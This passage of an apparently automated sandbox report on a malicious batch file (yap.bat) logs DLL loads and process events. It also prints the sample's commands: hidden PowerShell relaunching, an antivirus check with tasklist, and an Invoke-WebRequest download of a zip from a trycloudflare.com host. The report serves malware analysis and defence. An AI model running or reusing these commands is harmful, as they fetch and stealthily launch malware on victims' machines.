                Source: C:\Windows\System32\cmd.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: pcacli.dllJump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\System32\timeout.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\tasklist.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dllJump to behavior
                Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dllJump to behavior
                Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\find.exeSection loaded: ulib.dllJump to behavior
                Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dllJump to behavior
                Source: C:\Windows\System32\tasklist.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dllJump to behavior
                Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dllJump to behavior
                Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\find.exeSection loaded: ulib.dllJump to behavior
                Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                Source: C:\Windows\System32\tasklist.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq AvastUI.exe"
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                Source: Binary string: <p>The <a class="reference internal" href="../library/pdb.html#pdb.Pdb" title="pdb.Pdb"><code class="xref py py-class docutils literal notranslate"><span class="pre">Pdb</span></code></a> class constructor has a new optional <em>readrc</em> argument source: 3.6.html.24.dr
                Source: Binary string: <td><p>Install debugging symbols (<code class="docutils literal notranslate"><span class="pre">*.pdb</span></code>)</p></td> source: windows.html2.24.dr
                Source: Binary string: <li><a href="library/pdb.html#pdb.Pdb.run">(pdb.Pdb method)</a> source: genindex-all.html.24.dr
                Source: Binary string: .pdbrc source: genindex-all.html.24.dr
                Source: Binary string: <li><a href="library/pdb.html#index-1">Pdb (class in pdb)</a>, <a href="library/pdb.html#pdb.Pdb">[1]</a> source: genindex-all.html.24.dr
                Source: Binary string: <li><a href="library/pdb.html#pdb.Pdb.set_trace">(pdb.Pdb method)</a> source: genindex-all.html.24.dr
                Source: Binary string: <li><a href="library/pdb.html#pdb.Pdb.runeval">(pdb.Pdb method)</a> source: genindex-all.html.24.dr
                Source: Binary string: <p>On Windows now <a class="reference internal" href="../library/pdb.html#pdb.Pdb" title="pdb.Pdb"><code class="xref py py-class docutils literal notranslate"><span class="pre">Pdb</span></code></a> supports <code class="docutils literal notranslate"><span class="pre">~/.pdbrc</span></code>. source: 3.9.html.24.dr
                Source: Binary string: <li><a href="library/pdb.html#pdb.Pdb.runcall">(pdb.Pdb method)</a> source: genindex-all.html.24.dr
                Source: Binary string: <li><a href="library/pdb.html#index-2">.pdbrc</a> source: genindex-all.html.24.dr
                Source: Binary string: to control whether <code class="docutils literal notranslate"><span class="pre">.pdbrc</span></code> files should be read.</p> source: 3.6.html.24.dr

                Data Obfuscation

                barindex
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "Start-Process cmd -ArgumentList '/c \"C:\Users\user\Desktop\yap.bat\" hidden' -WindowStyle Hidden"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://german-tan-exotic-collectibles.trycloudflare.com/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "Start-Process cmd -ArgumentList '/c \"C:\Users\user\Desktop\yap.bat\" hidden' -WindowStyle Hidden"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://german-tan-exotic-collectibles.trycloudflare.com/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }"Jump to behavior
                Source: Yara matchFile source: yap.bat, type: SAMPLE
                Source: Yara matchFile source: 00000005.00000003.1243785632.0000023995B58000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2455424741.0000023995AE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 2944, type: MEMORYSTR
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FF88A6300BD pushad ; iretd 13_2_00007FF88A6300C1

                Hooking and other Techniques for Hiding and Protection

                barindex
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
